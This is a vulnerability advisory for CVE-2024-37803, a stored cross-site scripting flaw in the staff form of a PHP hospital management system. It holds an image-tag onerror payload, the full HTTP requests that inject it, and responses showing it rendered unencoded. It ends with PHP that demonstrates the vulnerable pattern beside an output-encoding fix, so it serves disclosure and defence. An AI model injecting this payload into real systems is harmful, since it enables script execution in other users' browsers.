# Exploit Title: Health Care Hospital Management System - Stored Cross-Site Scripting (XSS)
# Exploit Author: Himanshu Bindra
# Date: 2024-06-05
# Vendor Homepage: https://code-projects.org/health-care-hospital-in-php-css-js-and-mysql-free-download/
# Software Link: https://download-media.code-projects.org/2020/04/Health_Care_hospital_IN_PHP_CSS_Js_AND_MYSQL__FREE_DOWNLOAD_AkGgvwi.zip
# Version: 1.0
# Tested on: Windows 11, PHP 8.2.12, Apache 2.4.58
# CVE: CVE-2024-37803
#Description: Health Care Hospital Management System v1.0 allows remote attackers to inject arbitrary web script or HTML via the 'fname' and 'lname' parameters of /HMS/staff.php. The submitted values are stored and later rendered unencoded on /HMS/staffmemd.php (Staff members Details), so the injected script executes in the browser of any user who views that page.
#POC:
1) Go to the Staff info page (/HMS/staff.php) in the Health Care Hospital Management System. The PoC request below carries a PHPSESSID cookie and dmun=superadmin, i.e. it was sent from an authenticated session that is allowed to add staff members.
2) Fill in the staff details and put the payload in the "fname" and/or "lname" field. Payload: tes"><img+src=X+onerror=prompt(4356)></img>
3) Once the details are saved, open "Staff members Details" (/HMS/staffmemd.php). The stored payload is written into the page without HTML encoding and the JavaScript executes.
#Adding the Payload
HTTP Request:
POST /HMS/staff.php HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 206
Origin: --REDACTED--
Connection: close
Referer: http://--REDACTED--/HMS/staff.php
Cookie: PHPSESSID=podmt61i233pamo53i63gt78f7
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=1
dmun=superadmin&fname=tes"><img+src=X+onerror=prompt(4356)></img>&lname=test&addr=test%40test.com&tel=998877665&email=test123@GMAIL.COM&gender=Male&smbdd=2024-06-19&typesm=Doctor&workt=Morning&submit=SUBMIT
HTTP Response:
HTTP/1.1 200 OK
Date: Mon, 17 Jun 2024 18:07:39 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10412
--REDACTED--
<title>Health Care hospital</title>
<link rel="stylesheet" type="text/css" href="css/staff.css"/><script type="text/javascript" src="js/rightde.js
--REDACTED--
#Viewing the Staff details:
HTTP Request:
GET /HMS/staffmemd.php HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://--REDACTED--/HMS/staff.php
Cookie: PHPSESSID=podmt61i233pamo53i63gt78f7
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=1
HTTP Response:
HTTP/1.1 200 OK
Date: Mon, 17 Jun 2024 18:08:03 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 7087
Connection: close
Content-Type: text/html; charset=UTF-8
--REDACTED--
<td align="center">tes"><img src=X onerror=prompt(4356)></img> test</td>
<td align="center">Doctor</td> --REDACTED--
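#Fix (added example): The response above shows the stored 'fname' value emitted verbatim inside a <td>, so the fix belongs at that output sink. The PHP below is an added example and not code from the Health Care Hospital Management System: the real staffmemd.php is not reproduced here, render_vulnerable() is an assumed reconstruction of the concatenation pattern that produces the <td> seen in the PoC response, and $row is a constructed record holding the PoC payload.

```php
<?php
// Added example, not code from the Health Care Hospital Management System.
// The real staffmemd.php is not reproduced here: render_vulnerable() is an
// assumed reconstruction of the pattern that produces the <td> shown in the
// PoC response, and $row is a constructed record holding the PoC payload.
declare(strict_types=1);

// Constructed record, as staff.php would have stored it after the PoC POST.
$row = [
    'fname'  => 'tes"><img src=X onerror=prompt(4356)></img>',
    'lname'  => 'test',
    'typesm' => 'Doctor',
];

// Assumed vulnerable pattern: the stored values are concatenated straight
// into the HTML of the "Staff members Details" table.
function render_vulnerable(array $row): string
{
    return '<td align="center">' . $row['fname'] . ' ' . $row['lname'] . '</td>'
         . '<td align="center">' . $row['typesm'] . '</td>';
}

// Output encoding at the sink. ENT_QUOTES also encodes the single quote, so
// the same helper is safe inside single-quoted attributes; ENT_SUBSTITUTE
// replaces invalid UTF-8 instead of returning an empty string (which would
// silently drop the record); the charset must match the page's charset=UTF-8.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_hardened(array $row): string
{
    return '<td align="center">' . h($row['fname']) . ' ' . h($row['lname']) . '</td>'
         . '<td align="center">' . h($row['typesm']) . '</td>';
}

// Regression check for this PoC: no raw tag from the payload may survive in
// the rendered HTML, and the encoded form must decode back to exactly the
// stored value (encoding must not mangle legitimate names).
function payload_neutralized(string $html, string $stored): bool
{
    return strpos($html, '<img') === false
        && html_entity_decode(h($stored), ENT_QUOTES | ENT_HTML5, 'UTF-8') === $stored;
}

echo "vulnerable: ", render_vulnerable($row), "\n";
echo "hardened:   ", render_hardened($row), "\n";
echo "neutralized (vulnerable): ",
     var_export(payload_neutralized(render_vulnerable($row), $row['fname']), true), "\n";
echo "neutralized (hardened):   ",
     var_export(payload_neutralized(render_hardened($row), $row['fname']), true), "\n";
```

Run it with `php staff_render.php`: the vulnerable line reproduces the <td> from the PoC response, the hardened line shows the payload as inert text (`&lt;img ...&gt;`), and the checks report false for the former and true for the latter. Encoding at the sink is the actual fix; rejecting names that contain `<`, `>` or `"` in staff.php and serving a Content-Security-Policy that disallows inline script are defense in depth, not substitutes, because the same stored values may be rendered by other pages.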